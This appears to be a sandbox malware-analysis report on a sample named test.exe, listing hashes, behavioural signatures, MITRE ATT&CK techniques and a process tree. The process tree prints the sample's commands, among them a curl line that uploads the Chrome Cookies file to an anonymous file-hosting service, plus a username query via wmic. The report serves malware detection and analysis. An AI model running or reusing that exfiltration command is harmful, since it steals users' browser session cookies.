e2d03b941cd5fc4eada75d862d408fd4ae56408454ff06ffb6aa782e2010ef70

Analysis

max time kernel
10s
max time network
12s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
30/03/2023, 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.exe
Size

120KB
MD5

92d990e9813a556796de00d1f9546621
SHA1

87742c4c479a9a70816159dbf720982f5ef5ab83
SHA256

e2d03b941cd5fc4eada75d862d408fd4ae56408454ff06ffb6aa782e2010ef70
SHA512

84f983a56f2403ccfaab416021014411d9e2630591c2b5c134924e4f1615740a53048e22adac09adf43d813b6fc02bb8025d178be8bb67a8219352bef35223d2
SSDEEP

3072:f0FHdppuOf+wMSHjnywM0vY9t8Qkh+nLVkYw:cFPMOf+wMAywM0EJksnLVNw

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	test.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3648	WMIC.exe
Token: SeSecurityPrivilege	3648	WMIC.exe
Token: SeTakeOwnershipPrivilege	3648	WMIC.exe
Token: SeLoadDriverPrivilege	3648	WMIC.exe
Token: SeSystemProfilePrivilege	3648	WMIC.exe
Token: SeSystemtimePrivilege	3648	WMIC.exe
Token: SeProfSingleProcessPrivilege	3648	WMIC.exe
Token: SeIncBasePriorityPrivilege	3648	WMIC.exe
Token: SeCreatePagefilePrivilege	3648	WMIC.exe
Token: SeBackupPrivilege	3648	WMIC.exe
Token: SeRestorePrivilege	3648	WMIC.exe
Token: SeShutdownPrivilege	3648	WMIC.exe
Token: SeDebugPrivilege	3648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3648	WMIC.exe
Token: SeRemoteShutdownPrivilege	3648	WMIC.exe
Token: SeUndockPrivilege	3648	WMIC.exe
Token: SeManageVolumePrivilege	3648	WMIC.exe
Token: 33	3648	WMIC.exe
Token: 34	3648	WMIC.exe
Token: 35	3648	WMIC.exe
Token: 36	3648	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3648	WMIC.exe
Token: SeSecurityPrivilege	3648	WMIC.exe
Token: SeTakeOwnershipPrivilege	3648	WMIC.exe
Token: SeLoadDriverPrivilege	3648	WMIC.exe
Token: SeSystemProfilePrivilege	3648	WMIC.exe
Token: SeSystemtimePrivilege	3648	WMIC.exe
Token: SeProfSingleProcessPrivilege	3648	WMIC.exe
Token: SeIncBasePriorityPrivilege	3648	WMIC.exe
Token: SeCreatePagefilePrivilege	3648	WMIC.exe
Token: SeBackupPrivilege	3648	WMIC.exe
Token: SeRestorePrivilege	3648	WMIC.exe
Token: SeShutdownPrivilege	3648	WMIC.exe
Token: SeDebugPrivilege	3648	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3648	WMIC.exe
Token: SeRemoteShutdownPrivilege	3648	WMIC.exe
Token: SeUndockPrivilege	3648	WMIC.exe
Token: SeManageVolumePrivilege	3648	WMIC.exe
Token: 33	3648	WMIC.exe
Token: 34	3648	WMIC.exe
Token: 35	3648	WMIC.exe
Token: 36	3648	WMIC.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 5008	2736	test.exe	81
PID 2736 wrote to memory of 5008	2736	test.exe	81
PID 2736 wrote to memory of 5008	2736	test.exe	81
PID 5008 wrote to memory of 3312	5008	cmd.exe	84
PID 5008 wrote to memory of 3312	5008	cmd.exe	84
PID 5008 wrote to memory of 3312	5008	cmd.exe	84
PID 3312 wrote to memory of 3648	3312	cmd.exe	85
PID 3312 wrote to memory of 3648	3312	cmd.exe	85
PID 3312 wrote to memory of 3648	3312	cmd.exe	85
PID 5008 wrote to memory of 4920	5008	cmd.exe	86
PID 5008 wrote to memory of 4920	5008	cmd.exe	86
PID 5008 wrote to memory of 4920	5008	cmd.exe	86

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS9436.tmp\test.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic computersystem get username /value
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3312
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get username /value
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3648
- - C:\Windows\SysWOW64\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" https://api.anonfiles.com/upload?token=44f5bc2e79115d7d
    3⤵
    PID:4920

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS9436.tmp\test.bat

Filesize
305B

MD5
2556e28cb4004a2e3733cee82f393347

SHA1
1e60ba59620f2a110834adec366d4d75603478ee

SHA256
02e9e68abc4558c5fa6e23729045ecc680956c174fc32710c00e51c3a465b31f

SHA512
8e50ab2e01094370e92ede9a8698c8228be55ed23a819b969446d3ce9d32c724846df146b365daaa21c84f7829160c501b93e9b8cb7b7909631d6c7d9d5aa5bf

Download Submit